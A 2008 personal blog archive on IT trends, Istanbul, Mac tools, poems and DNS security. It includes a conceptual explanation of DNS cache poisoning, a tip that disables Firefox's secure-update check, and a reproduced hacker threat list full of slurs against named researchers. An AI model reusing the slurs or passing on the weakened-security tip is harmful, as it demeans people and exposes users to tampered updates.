I suspect few legacy IT companies or old world IT Departments are ready to cope with this uncomfortable scenario, even though they know it is on the horizon. With the global economy providing the heat, and businesses laser-focusing on cost, expect this little chemical reaction to drastically speed up 2009.

The passengers are revolting

Just about every major company funds a junkyard of application systems and technologies attached to them. Few have had the incentive to fix this, much to the consternation of corporate IT departments. Remember the IT cost justification for that ERP system - all those systems that it would replace, but somehow never did. And recognize the fact that this residue of junkyard legacy counts for a big part of the IT budget, and generates lots of operational inefficiency.

Depression-level economics will force line managers to actually take charge of this expense they unknowingly caused. Expect systems on which the company is apparently so dependent to go, and with them much of the IT junk. As a result, expect a lot of high margin break/fix work that propped up the cash flow of legacy IT companies to disappear.

The Fat Controllers lose patience

Senior managers have moved from being in awe of IT's potential, to deep disappointment at its lack of pay-off. About now, expect them to figure out that process engineering etc. needs to go - see Asian Back Office above. Once this mindset starts, expect to see a whole different senior management attitude.

Google and Microsoft, both at their core, are people productivity-centric, and will likely play a much bigger front office productivity role - look at Google's Gears and Microsoft's front office re-emphasis. Watch the gathering rush to bundle solution technology between front office (which these guys own) and back office (which Asian outsourcers will increasingly own). What's left is innovation and application - good luck with that, IT boys and girls. That's a whole different world, and one that few IT grunts have ever lived in.

Finally, the wrong kind of snow on the lines

Expect high margin networking equipment companies to fall to earth. Increasingly, when dealing with procurement departments, expect them to fail to explain that products from the likes of D-Link that cost a fraction of their price, but have the same specs, are inferior. Hey, we all know they have the same basic building block components, work to the same standards and are already at throwaway prices.

And don't expect our pals at the telephone companies to hold the line. They are up to their ass in fiber, broadband and shortly WiMax, while consumers drain the landline and traditional phone services swamp. If you don't believe it - then use Magic Jack to provide your unlimited telephone and fax services in the USA for $20 a year. YES - TWENTY BUCKS A YEAR!

And as night falls on the Island of Sodor, Thomas and his friends worry about the scrap heap....

Wednesday 31 December 2008

End of the year, show me the stats!

This little vanity blog is getting at least some hits from you guys [thanks!] and I thought it would be nice to share with you what you are looking for, at least when you are using your google fu:

1. google street view amsterdam
2. mokum von amsterdam
3. amsterdam iphone
4. street view amsterdam
5. firefox fullscreen os x
6. "put your mouth where your money was"
7. google street view netherlands
8. failed keyboard-interactive/pam for invalid user
9. amsterdam street view
10. forgotten hope 2.0.rar

And from google you came:
1. google 2,257
2. yahoo 19
3. aol 17
4. search 13
5. altavista 4
6. msn 2
7. lycos 1
8. netscape 1

You love my root and it shows:
1. / 2,629
2. /2008/07/google-car-in-amsterdam-holland.html 293
3. /2008/01/sound-noise-good-neighbours.html 280
4. /2008/08/best-things-in-life-are-free.html 188
5. /2007/09/bring-it-on.html 182
6. /2008/05/ssh-brute-force-botnet.html 147
7. /2008/08/pdps-older-mailbox-volumes-compromized.html 114
8. /2008/03/firefox-fullscreen-on-osx.html 110
9. /2007/09/full-body-scan.html 99
10. /2008/07/battlefield-2-new-patch-15-and-3-new.html 86

Your tools? As expected:
1. Firefox
2. Internet Explorer
3. Safari [iPhone's I am sure]
4. Opera
5. Mozilla
6. Chrome
7. Mozilla Compatible Agent
8. Netscape
9. Camino
10. HPiPAQ910

Your OS:
1. Windows 3,340 77.19%
2. Macintosh 745 17.22%
3. Linux 175 4.04%
4. iPhone 41 0.95%
5. (not set) 14 0.32%
6. FreeBSD 5 0.12%
7. SunOS 3 0.07%
8. SymbianOS 3 0.07%
9. Nintendo Wii 1 0.02%

Hope this satisfies your never ending lust for facts & figures.

Tuesday 30 December 2008

Happy birthday to you, happy birthday to me!


Blowing out candles is sooo 2007!

Tuesday 23 December 2008

Mantra from the Dalai Lama

1. Take into account that great love and great achievements involve great risk.

2. When you lose, don't lose the lesson.

3. Follow the three R's:
Respect for self
Respect for others and
Responsibility for all your actions.

4. Remember that not getting what you want is sometimes a wonderful stroke of luck.

5. Learn the rules so you know how to break them properly.

6. Don't let a little dispute injure a great friendship.

7. When you realize you've made a mistake, take immediate steps to correct it.

8. Spend some time alone every day.

9. Open your arms to change, but don't let go of your values.

10. Remember that silence is sometimes the best answer.

11. Live a good, honourable life. Then when you get older and think back, you'll be able to enjoy it a second time.

12. A loving atmosphere in your home is the foundation for your life.

13. In disagreements with loved ones, deal only with the current situation. Don't bring up the past.

14. Share your knowledge. It's a way to achieve immortality.

15. Be gentle with the earth.

16. Once a year, go someplace you've never been before.

17. Remember that the best relationship is one in which your love for each other exceeds your need for each other.

18. Judge your success by what you had to give up in order to get it.

19. Approach love and cooking with reckless abandon.

Sunday 14 December 2008

A geek mind is a joy forever!

/dev/tty.PL2303-00001004
==
http://osx-pl2303.sourceforge.net/
+
Prolific PL2303 USB serial adapter

Saturday 29 November 2008

Panorama by Calico






Made possible by Calico. What a kick ass tool!

Wednesday 26 November 2008

Faruk Yazicilar is king!

WOW! Was my first impression when I coincidentally walked into [read 'Paradise Lost' for some history on the name] the work of the Istanbul based artist Faruk Yazicilar.

WOW! What a strong image, such constrained but strong expressions.

I would really like to meet this man and see more of his work and if all works out: get one as a present to my beloved.

If only there was more of his work online, till the time I meet him...


And on a side note: why the sudden interest late October from telia stofa a/s, opal telecommunications internet service provider and the arts institute at bournemouth for my domains do know evil?

Tuesday 25 November 2008

I want a Nixie Watch


Forget the slick and expensive gold bling bling crap!

The Nixie Watch is the real deal and the only thing one can give a true geek.

Made by a super geeky dude who is into cathodes like a tornado is into trailer parks, this watch is something I can no longer live without.

Friday 21 November 2008

New MacBook Pro, now what?

It is the same on all new machines: it takes a while to get it to look & feel the way you like it most.

The patches
FireFox plus noscript & adblock
xcode
darwinports
wget
nmap
mtr
unrar
wireshark
Skype
iWork
Picasa Web Albums Uploader
Crossover
Visio
Google Earth
fugu

And then some, but by the time this is done... man!

More:
vmware
roxio toast
wow
rEFId
BackTrack

And more later.

More like:
tuntap
HandBrake

Friday 31 October 2008

Time to go home

BU SİTEYE ERİŞİM ENGELLENMİŞTİR

Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 tarih ve 2007/1705 nolu kararı gereği bu siteye erişim TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI'nca engellenmiştir.

Access to this web site is banned by "TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI" according to the order of: Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 of 2007/1705.


Wednesday 29 October 2008

Hip Istanbul, a hot view & good people.

So let's talk about the good stuff in Istanbul. The free people. The scene that has [a little more] money and knows where to go.

The evening started off at a friend's place. He rents an apartment in the groovy district Cihangir. It has everything one could want from a [temporary] place. Lovely old paintings on the stairways, where the teeth of time have left their marks, the stains of water leaking and many a dent of all the people and goods going up and down in the never ending struggle for life and security.

The details in the apartment all tell a story or two. About the original intent and the good & the bad. The attempts to improve or to restore. All have left their traces.





Later that night I went to a place called 5.Kat [in English: the fifth floor]. What a lovely view! Great view over the Bosporus and an even better crowd. Then enters the owner: Yasemin Alkaya. She used to work as an actress and now runs one of the hottest bars|restaurants in town.

She cooks, waits tables, hosts and entertains her guests with such elegance and style that it was love at first sight for me. I will be back here, as often as I can.

Other places:
Sabahattin Fish!
Develi Kebab
Changa International
Ulus 29 see and be seen

With thanks to Erdal Gökyıldırım for his tips and comments :D

Saturday 25 October 2008

So, how was your holiday?


Friday 17 October 2008

Put your mouth where your money was.

Be fearful when others are greedy, and be greedy when others are fearful.

How difficult a message is that? Well, it seems really really difficult. The investor everybody loves to love, Warren Buffett, is making a bundle and screaming at the top of his lungs that he does and so should you. Buy equities.

Friday 3 October 2008

The challenges @ Dagobert Duck

Because of my ties with a couple of people who work at SURFnet, I accepted an invitation to do a presentation. The audience consists mainly of university students and technical employees of universities, so the question was whether I could shed some light on the differences of working at really big companies.

I tried :P

The differences are so extreme that sometimes it seems as if our methods and challenges have no shared needs or issues. This is not true. We fight the same monsters, technically, we just have a different landscape.

Think of it like BF2 & CoD.

A fun day with some excellent content brought by very capable people, so I am happy to say that these were 2 days well spent. Since this is a university environment, speakers were much more encouraged to give some juicy details, details you would normally not let out with a mic in your face. The questions are of such relevance to the issues discussed, and not aimed at getting quotable 'bedroom secrets', that many a PR person would feel uncomfortable with the intimacy of the details exchanged.

Exactly the kind of details & environment I like and can actually use in my day to day job.

SURFnet et al.: thank you!

Saturday 27 September 2008

The best baklava from Istanbul!



I love real good Baklava. The best in Istanbul you have to buy at Karakoy Gulluoglu in the Rihtum street, Karakoy. It is close to the Galata Tower.

See for yourself:


I met the founder, Mr Mustafa Gullu who started the shop and workplace in 1949. Since then not a single other shop was opened. If you want the best Baklava in Istanbul, you have to go here. No alternatives :D

I normally stay at the Moevenpick and it takes about 30 minutes of frantic driving through the city. Cab driving in Turkey is something that follows a few simple rules:
  1. Change lanes, just because you can
  2. Do NOT look to the cars in front of you
  3. Keep no distance
Being a passenger means you avoid sitting next to the driver and concentrate on anything but the traffic...

Sunday 21 September 2008

Most pathetic, hands down.

Of course picking on Microsoft has always been easy. Way too easy. So for me the laughing stock of this decade has always been the inspired leader of Vodaphony and the AV bosses.

But MS has outdone most of the attempts for gaining the top spot. Since absolutely no one wants or uses Vista, a low life MS marketing droid came up with the brilliant plan to show people Vista and not tell them it was Vista and record their happy feelings... Did not work, so plan B: get a well-known dude to sell your stuff, that failed again.

That did not really work, so then they moved to the oldest trick in the book: if you can't beat them, copy them. So the market got a piece of MS interpretation of the fabulous "Hi I am a Mac, and I am a PC" commercials from Apple, but then done by Microsoft.

Now guess what? The stuff has been made on a ... MAC :D


Rock on losers!

Sunday 14 September 2008

Hurricane Electric roxs on!

Years ago I hosted one of my servers over at Hurricane Electric [still LOVE that domain!]. At the time a small hosting company with Linux knowledge and a heart on the right spot.

The interface to the company was, well, minimal. A simple page with no 2.0 features or 1.0 features for that matter :D The service was good; even with complicated stuff like mail hosting and DNS stuff they would always have a good solution available. At times the tech guy [Mike Leber] would even ssh to my server and assist, really hands on & friendly.

Now they are the most reliable hosting company in the month of August 2008. Congratulations!

They run the tenth largest international network in the world.

Might be a nice idea to setup a total ipv6 host there...

Sunday 7 September 2008

WAITING FOR THE WHITE KNIGHT

the princess feels with a wet finger
whether her iron is hot enough
pulls up her chastity belt
a little

her white knight?
a rattling suit of armour
a little man with an itch

the princess waits
for the heat of her iron
time passes

-- Emma Klage

Friday 29 August 2008

Bomb bomb bomb Iran!

All systems go! The Dutch secret service has withdrawn all their spies from Iran and one of them informed the media that this is because the States are going to attack Iran with drones, RSN.

Coming from the Dutch secret service directly, this has to be true :P

Let's hope that at least CNN has some webcams rolling so we can enjoy the show.

Thursday 28 August 2008

julie moult is an idiot...

...at least, that is what google gives when you search for "julie moult". The lady apparently thought she understood the concept of google bombing enough to write about it and... well, it backfired.

There are plenty people who do not like her style, her subjects and even the newspaper she writes for and of course the community loves making a point.

As one blogger puts it: Julie Moult is an idiot. And we're here to let her know.
Stealer of images (from top fellow Beau Bo d'Or) and all-round Daily Mail Hackette, Julie needs a wee lesson in the art of Googlebombing...

Google gives about 330 for "julie moult" +idiot right now. Guess that will be many more soon.
Update [14-sept-2008] 43.000 for "julie moult" +idiot right now.
Update [14-dec-2008] about 2,440 for "julie moult" +idiot

Sunday 24 August 2008

SATA Windows DVD ServicePacks :(

Since my last still standing PC is equipped with JMicron 363 SATA on board and SATA disks only, installing Windows is somewhat of a bitch since the last floppy drive left the house about 8 years ago.

XP is from the era that every machine still had a floppy drive so when you need to load an extra driver the only option you got is... supplying these drivers on a floppy.

Luckily there are more people who suffer from this handicapped feature and did something about it: nlite is the solution for XP. It enables one to easily make a slipstreamed XP image with added drivers [SATA comes to mind], Service Packs, patches, regional settings, XP key and much more.

Until a week ago, I would rely on InfraRecorder [open source] to burn ISOs to CDs and DVDs, but I noticed an issue with an ISO I had downloaded and tried to burn on a DVD: it was in CD format so the results were not what I expected. ImgBurn is much more advanced and able to convert CD format to DVD, on the fly. It does not get much easier than that.

So armed with a slipstreamed ISO, packed with SATA drivers, SP3 and then some, I booted the beast to be hit by various BSoDs... So that was my last attempt to have a pure Windows machine.

Microsoft, it was good as long as it lasted but this is my final goodbye. I will still use your OS'es at times [for games & on dreaded corporate machines!] but I will not ever spend a cent on it again.

Vista might be lame to most, for me it is a bridge too far and something I am not even looking at.

Photo by algo

Friday 15 August 2008

DNSsec as a solution, right?

Since the latest DNS patch horror for those who _still_ use BIND over DJBDNS or OpenDNS, a lot of smart people who know a lot more about DNS than you & me together have been pointing to DNSsec as an even better cure.

DNSsec is a bitch to set up and use; even the gurus over at SANS are reluctantly and carefully touching the DNSsec waters. To actually benefit from the sec part of DNSsec, the end user would need to 'see' something like a nice big fat green thingy when connected to a DNSsec protected website, right?

Unfortunately DNSsec is still not really widely deployed. There is no built-in Firefox [or any other browser for that matter] support.

Well, for Firefox there is an extension for all your needs, so for DNSsec there is one too. It is called the DRILL extension. It would not install on my FF 3.0.1 since the DRILL extension ‘will not be installed because it does not provide secure updates’. Solution: go to the about:config page, create a new boolean called extensions.checkUpdateSecurity and set it to false, which switches off that secure-update check. Try again & fail again: the extension does not support FF 3.x

So much for the nice effort.

KPN Internet Mobile + HuaWei + OSX == horror

GRRR!

A couple of months ago I bought a PCMCIA UMTS card with a KPN subscription for Mobile Internet for my Mac PowerBook. Costs a couple of euro but it provides me with Internet access when not being able to connect to a cable, for whatever reason.

I bought a MacBook a little later and since it does not have a PCMCIA slot, got myself a HuaWei E270 USB device to go with it. The HuaWei USB will automount, show the drivers that need to be installed and does so with all the correct settings preloaded: if one runs some sort of windows.

I do not.

Luckily KPN provides a dmg with the correct config from their website for us 'few' MAC users. Nice.

Unfortunately my connection suffers from various problems:
  • connection speed sucks: 100 KB/s top rate up & down
  • the HuaWei driver kernel panics OSX
  • syslog takes up to 80[!!!] % of the CPU when being flooded by the HuaWei driver
Of course the KPN helpdesk offers 'solutions' that do not cut ice:
  1. Use another OS [riiight!]
  2. Use another machine [Ok, give me one!]
  3. Have the HuaWei driver installed by a service point [it is!]
Google assistance required. I took a random [1 in a million :P ] syslog line "RemovefromQueue: Enter, MaciSize" and found more people who are complaining their syslog was being filled up by the HuaWei driver messages, unstable connections & other jazz. In the HuaWei forums people are going rampant suggesting to go wired DSL because this seems not to be resolved, although the user x00114004 [whose profile claims he works at HuaWei] says he has sent the information to the R&D department. Over at the Apple Support forums it is the same. In Australia too.

Most complaints are about the E220, but some mention the E226 and mine is the E270.

Luckily there is an updated version of the E270 driver available for OSX, unfortunately it is wrapped in a .EXE, sigh...

So much for using China products sold by the KPN.

Thursday 14 August 2008

Waardeloos

versleten ruggen
uitgebluste vuurtorens
gemankeerde meiers
droevige geeltjes
jammerlijke joetjes
verlopen vijfjes
kansarme knaken
zielige pieken
hongerende heitjes
snikkende stuivers
waardeloze centen
-- Emma Klage

GOOD NEWS: Cervelat-Krise passed!

Life saver: The Brazilian Zebu*-cow-intestine can be imported into Europe again.

After the bovine spongiform encephalopathy crisis it was verboten to import specific parts of the cows into Europe.

Since the Cervelat.CH needs the best available bowels for its perfect curve & taste, only the Zebu's intestine can do. Thank G*d this is allowed again.

* Well actually it is more [5/8] Chanchim, but they look like Zebu.

Wednesday 13 August 2008

Meester Boukema

als je niet buiten roken kunt
kunt je buiten roken

is fout

als U niet buiten roken kunt
kunt U buiten roken

is goed

Tuesday 12 August 2008

The best things in life are free...

...but you can give them to the birds and bees, I want money!

How is that: you give away a kick ass front-end, secure IMAP & POP, more storage space than anyone and a near perfect service, and everyone is silently using ad-blockers to prevent you from making money and you accept that. But when there is ONE DAY of availability issues with that kick ass service, people go ape shit and you even apologize!

I would like to thank the gmail team for exceeding all my expectations, consistently.

Sunday 10 August 2008

iPhone 2.0 but where is the...

..normal functions, like:
How come some hippy hackers can do all the cool stuff but Apple doesn't?

Even the PwnageTool looks better than iTimes FFS!

pdp's older mailbox volumes compromised, DUH!

The "Great Council of Internet Superheros" [internetsuperheros@hushmail.com] has compromised the older mailbox RAR volumes of Petko D. Petkov [AKA pdp] and posted lots of it on RapidShare.

They threaten a whole bunch of people:

The Judge for Security Sellout Crimes hereby wages war against:

|/| Tom Ferris @ adobe.com security-protocols.com
|/| Matasano LLC @ matasano.com sockpuppet.org
|/| Nate Lawson @ rootlabs.com
|/| Joanna Rutkowska @ trannyvideos.com
|/| Petko D. Petkov @ googlemail.com gnucitizen.org
|/| Matt Richard @ idefense.com
|/| /\) Toralv Dirro @ mcafee.com AVERT Labs
|/|/\/ Dan Kaminsky @ ioactive.com arkham.wstn.ioactive.com
|/|\/ Dror Shalev @ sec.drorshalev.com
(\\\) Dragos Riuiu @ gaysecwest.com
(\\\) Thorsten Holz @ honeynet.org mwcollect.org
(\\\) Andre Protas @ eeye.com mwcollect.org (IDA leaker)
(\\\) Gadi Evron @ linuxbox.org kosherobese.org
(\\\) Valdis Kletnieks @ vt.edu & his alcoholic mother
/\\/\ Robert Lemos @ securityfocus.com
/ ,^./\ Ryan Naraine @ zdnet.com gmail.com
/ / \/\ Beyond Security @ Isreal, Gadi's bitch tits
/ / \/\ SecReview @ blogspot.com (gay reviews)
( ( )/) Juha-Matti Laurio @ netti.fi & Isreal (blog moron)
| | |/| Sergio Alvarez @ gmail.com nruns.com (AV rapist)
| | DIE |/| Theo de Raadt @ cvs.openbsd.org gaydate.com
| | |/| Alan Shimel @ yahoo.com stillsecure.com
( ( )/) Lance M. Havok @ dumb.lame.idiot.pl
\ \ / / kingcope/kcope @ gmx.net lame.idiot.de
\ `---' / Jennifer Granick @ whitefat.defender.lame
`-----' David Maynor @ gmail.com erratasec.com apple.com
Andrew Cushman @ microsoft.com gossip.sec

I wonder where this is going to end. Some big names here and I am sure not all will take it lying down. The compromise of pdp's account should warn people...

Thursday 7 August 2008

Andrea Pininfarina --- morte


Andrea Pininfarina, the CEO of one of the best car designing companies ever, has died on a Vespa [style].

He and his Vespa scooter collided with a Ford Fiesta[FFS] about 8:15 a.m. in Trofarello.

Andrea died, Vespa broke, Fiesta lives: where is the justice in this?

Tuesday 5 August 2008

Never ever ever talk to the police

Do not trust me, trust someone who knows:



As an investigator, I can only agree: everything you say can and will be used against you. One of my most respected teachers on the subject taught me another trick. It comes down to screaming 'I NEED HELP' and I will leave it to the reader to think up the context as in when the time has come to [ab-]use this.

Most people are not even aware that LYING is allowed in the process of interrogation...

Thanks Bruce

Saturday 2 August 2008

My TraceRoute for OSX?

Damn:

checking sys/xti.h presence... no
checking for sys/xti.h... no
checking for floor in -lm... yes
./configure: line 6742: syntax error near unexpected token `1.0.0,'
./configure: line 6742: ` AM_PATH_GTK(1.0.0, CFLAGS="$CFLAGS $GTK_CFLAGS"'

MyTraceRoute is a kick ass network connection 'debug' implementation that sends a sequence of ICMP ECHO requests to each hop to determine the quality of the link to each machine. As it does this, it prints running statistics about each machine.

iPhone:~ root# ./mtr --report www.google.com
HOST: iPhone Loss% Snt Last Avg Best Wrst StDev
1. 192.168.1.2 0.0% 10 2.0 9.6 1.9 72.4 22.1
[SNIP]
14. 12.88.155.14 66.7% 9 24.4 63.0 20.7 143.8 70.0
15. 216.239.48.110 87.5% 8 23.7 23.7 23.7 23.7 0.0
16. 66.249.95.149 25.0% 8 38.0 37.0 35.1 39.8 1.7
17. ??? 100.0 8 0.0 0.0 0.0 0.0 0.0
18. 209.85.253.161 14.3% 7 46.7 44.4 36.9 50.6 5.3
19. 74.125.47.104 85.7% 7 36.8 36.8 36.8 36.8 0.0

Simple, light & uses stuff we have been using for years, just a little better. The way I like it. It runs nicely on the iPhone, install it via Cydia, but for the love of cheese I can not compile it on my OSX Darwin MacBook.

Anyone?

Friday 1 August 2008

Switzerland FTW!


1st of August is Switzerland's national day. On this day Swiss people burn stuff, while speaking a funny language.
One of the two most beautiful countries in the world, in my book. And certainly the one country with the best possible implementation of a democracy.
They do not work too efficiently, following Canada and being trailed by Trinidad & Tobago on the GDP list, but that only makes it extra pleasant to live there.
Today I wish all people with a @.CH email address a super nice day with many friends and even more fire!

Tuesday 29 July 2008

Search and you will WHAT???

As much as I loved stumbling on google when it was starting up, as eager I have been finding even better engines.

It is amazing how difficult it is to build a better google. The latest attempt is called cuil and it too, fails.

I challenge you to find anything. So far only the simplest of searches yields usable results. Like searching for linkedin actually gives www.linkedin.com as a first hit: well done. Searching for 'mokum von Amsterdam' gives two pages of something I once posted on the Wired blog and that has been replicated 1.000 times on other sites: no link to this blog or anything useful.

Try searching for 'ING bank' in google and in cuil. Tell me why on earth ING Poland & Timisoara show up in Cuil on page one? How on earth did these guys fill up their repository?

Altavista does better FFS! [as a matter of fact, altavista showed me a nice bar in Berlin I will visit next time around].

Lessons learned: stick to google, use altavista more often, wait till cuil grows up, if ever.

Monday 28 July 2008

DE ONTVOERING

hun hebben zij
klaagt de klant tegen de kapper

hun hebben zij
is niet goed Nederlands, meneer
wist de knipper

zij hebben haar, meneer
zij hebben haar

-- Frans Engels

Friday 25 July 2008

Why OpenDNS [if you can not run DJBDNS]

To test, I let DHCP update my resolv.conf file with the DNS servers of my [horribly slow!] KPN Internet mobile connection:

bash-3.2# cat /etc/resolv.conf
nameserver 208.67.222.222
nameserver 208.67.220.220
nameserver 62.133.126.28
nameserver 62.133.126.29

The top two addresses are my 'normal' DNS entries, from the fine folks of OpenDNS [who were secure since day one].

Now let's check the DNS servers from both OpenDNS & KPN mobile with a simple dig:

bash-3.2# dig @208.67.220.220 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.6 is GOOD: 28 queries in 1061.8 seconds from 28 ports with std dev 17429.24"
bash-3.2# dig @208.67.222.222 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.4 is GOOD: 26 queries in 4.3 seconds from 26 ports with std dev 20231.33"

bash-3.2# dig @62.133.126.28 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.28 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"
bash-3.2# dig @62.133.126.29 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.29 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"

Of course, nothing beats djbdns, but for day-to-day use, OpenDNS p0wnserz your provider's DNS hands down.

To keep your resolv.conf file safe and clean on OSX and prevent DHCP from updating it, set the immutable bit:
chflags uchg /var/run/resolv.conf
To remove the flag use:
chflags nouchg /var/run/resolv.conf
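
As an added example (not part of the original post), the script below parses the four `dig +short` answers shown above and estimates how much a blind forger would still have to guess for each resolver. The function names and the uniform-spread estimate of port entropy are assumptions of this example, not DNS-OARC's own scoring.

```python
import math
import re

# `dig +short` output copied from the four runs above: each run prints the
# CNAME target first, then the TXT record carrying the verdict.
DIG_OUTPUT = """\
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.6 is GOOD: 28 queries in 1061.8 seconds from 28 ports with std dev 17429.24"
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.4 is GOOD: 26 queries in 4.3 seconds from 26 ports with std dev 20231.33"
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.28 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.29 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"
"""

VERDICT_RE = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is (?P<rating>[A-Z]+): '
    r'(?P<queries>\d+) queries in (?P<seconds>\d+(?:\.\d+)?) seconds '
    r'from (?P<ports>\d+) ports? with std dev (?P<stddev>\d+(?:\.\d+)?)'
)

SQRT12 = math.sqrt(12)  # std dev of a uniform spread of width W is W / sqrt(12)


def parse_verdict(line):
    """Return the fields of one porttest TXT line, or None for any other line.

    Note that `ip` is the address the test saw the queries arrive from, which
    need not be the resolver address that was typed after the `@`.
    """
    m = VERDICT_RE.fullmatch(line.strip().strip('"'))
    if m is None:
        return None
    return {
        "ip": m["ip"], "rating": m["rating"],
        "queries": int(m["queries"]), "seconds": float(m["seconds"]),
        "ports": int(m["ports"]), "stddev": float(m["stddev"]),
    }


def port_bits(stddev):
    """Estimate bits of source-port unpredictability from the std dev alone.

    Assumption of this example: ports are spread uniformly over one range,
    so the range width is about stddev * sqrt(12), capped at 65536 ports.
    """
    width = min(65536.0, max(1.0, stddev * SQRT12))
    return math.log2(width)


def assess(verdict):
    """Add what a blind forger has to guess: the 16-bit query id plus the port."""
    fixed = verdict["queries"] > 1 and verdict["ports"] == 1
    bits = 16.0 + (0.0 if fixed else port_bits(verdict["stddev"]))
    return dict(verdict, fixed_port=fixed, guess_bits=round(bits, 2))


def audit(dig_output):
    """Parse every verdict in pasted dig output, weakest resolver first."""
    verdicts = [v for v in map(parse_verdict, dig_output.splitlines()) if v]
    return sorted((assess(v) for v in verdicts), key=lambda a: a["guess_bits"])


if __name__ == "__main__":
    for a in audit(DIG_OUTPUT):
        flag = "FIXED SOURCE PORT" if a["fixed_port"] else "randomised ports"
        print(f'{a["ip"]:<15} {a["rating"]:<5} {a["ports"]:>3}/{a["queries"]} ports '
              f'~{a["guess_bits"]} bits to guess  {flag}')
```

For comparison, a perfectly uniform spread over all 65536 ports has a std dev of about 18919, so both OpenDNS figures are consistent with full-range randomisation while the KPN resolvers leave only the 16-bit query id.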

Wednesday 23 July 2008

CloudTablet or CloudPannel?


Interesting idea over at TechCrunch: a simple, US$200 WebTablet, running FireFox & Skype.

For me this is the ultimate CloudPannel [zero hits ATM], or CloudTablet [less than 350 hits ATM], whatever you prefer.

I would like 5 or 10 laying around the house for easy web 2.0 access!

Tuesday 22 July 2008

DNS issues released

The cat is out of the bag. Yes, Halvar Flake figured out the flaw Dan Kaminsky will announce at Black Hat.

1.

Pretend for the moment that you know only the basic function of DNS — that it translates WWW.VICTIM.COM into 1.2.3.4. The code that does this is called a resolver. Each time the resolver contacts the DNS to translate names to addresses, it creates a packet called a query. The exchange of packets is called a transaction. Since the number of packets flying about on the internet requires scientific notation to express, you can imagine there has to be some way of not mixing them up.

Bob goes to a deli, to get a sandwich. Bob walks up to the counter, takes a pointy ticket from a round red dispenser. The ticket has a number on it. This will be Bob’s unique identifier for his sandwich acquisition transaction. Note that the number will probably be used twice — once when he is called to the counter to place his order and again when he’s called back to get his sandwich. If you’re wondering, Bob likes ham on rye with no onions.

If you’ve got this, you have the concept of transaction IDs, which are numbers assigned to keep different transactions in order. Conveniently, the first sixteen bits of a DNS packet is just such a unique identifier. It’s called a query id (QID). And with the efficiency of the deli, the QID is used for multiple transactions.

2.

Until very recently, there were two basic classes of DNS vulnerabilities. One of them involves mucking about with the QID in DNS packets and the other requires you to know the Deep Magic.

First, QIDs.

Bob’s a resolver and Alice is a content DNS server. Bob asks Alice for the address of WWW.VICTIM.COM. The answer is 1.2.3.4. Mallory would like the answer to be 6.6.6.0.

It is a (now not) secret shame of mine that for a great deal of my career, creating and sending packets was, to me, Deep Magic. Then it became part of my job, and I learned that it is surprisingly trivial. So put aside the idea that forging IP packets is the hard part of poisoning DNS. If I’m Mallory and I’m attacking Bob, how can he distinguish my packets from Alice’s? Because I can’t see the QID in his request, and the QID in my response won’t match. The QID is the only thing protecting the DNS from Mallory (me).

QID attacks began in the olden days, when BIND simply incremented the QID with every query response. If you can remember 1995, here’s a workable DNS attack. Think fast: 9372 + 1. Did you get 9372, or even miss and get 9373? You win, Alice loses. Mallory sends a constant stream of DNS responses for WWW.VICTIM.COM. All are quietly discarded — until Mallory gets Bob to query for WWW.VICTIM.COM. If Mallory’s response gets to your computer before the legitimate response arrives from your ISP’s name server, you will be redirected where Mallory tells you you’re going.

Obvious fix: you want the QID to be randomly generated. Now Alice and Mallory are in a race. Alice sees Bob’s request and knows the QID. Mallory has to guess it. The first one to land a packet with the correct QID wins. Randomized QIDs give Alice a big advantage in this race.

But there’s a bunch more problems here:

  • If you convince Bob to ask Alice the same question 1000 times all at once, and Bob uses a different QID for each packet, you made the race 1000 times easier for Mallory to win.

  • If Bob uses a crappy random number generator, Mallory can get Bob to ask for names she controls, like WWW.EVIL.COM, and watch how the QIDs bounce around; eventually, she’ll break the RNG and be able to predict its outputs.

  • 16 bits just isn’t big enough to provide real security at the traffic rates we deal with in 2008.

Your computer’s resolver is probably a stub. Which means it won’t really save the response. You don’t want it to. The stub asks a real DNS server, probably run by your ISP. That server doesn’t know everything. It can’t, and shouldn’t, because the whole idea of DNS is to compensate for the organic and shifting nature of internet naming and addressing. Frequently, that server has to go ask another, and so on. The cool kids call this “recursion”.

Responses carry another value, too, called a time to live (TTL). This number tells your name server how long to cache the answer. Why? Because they deal with zillions of queries. Whoever wins the race between Alice and Mallory, their answer gets cached. All subsequent responses will be dropped. All future requests for that same data, within the TTL, come from that answer. This is good for whoever wins the race. If Alice wins, it means Mallory can’t poison the cache for that name. If Mallory wins, the next 10,000 or so people that ask that cache where WWW.VICTIM.COM is go to 6.6.6.0.

3.

Then there’s that other set of DNS vulnerabilities. These require you to pay attention in class. They haven’t really been talked about since 1997. And they’re hard to find, because you have to understand how DNS works. In other words, you have to be completely crazy. Lazlo Hollyfeld crazy. I’m speaking of course of RRset poisoning.

DNS has a complicated architecture. Not only that, but not all name servers run the same code. So not all of them implement DNS in exactly the same way. And not only that, but not all name servers are configured properly.

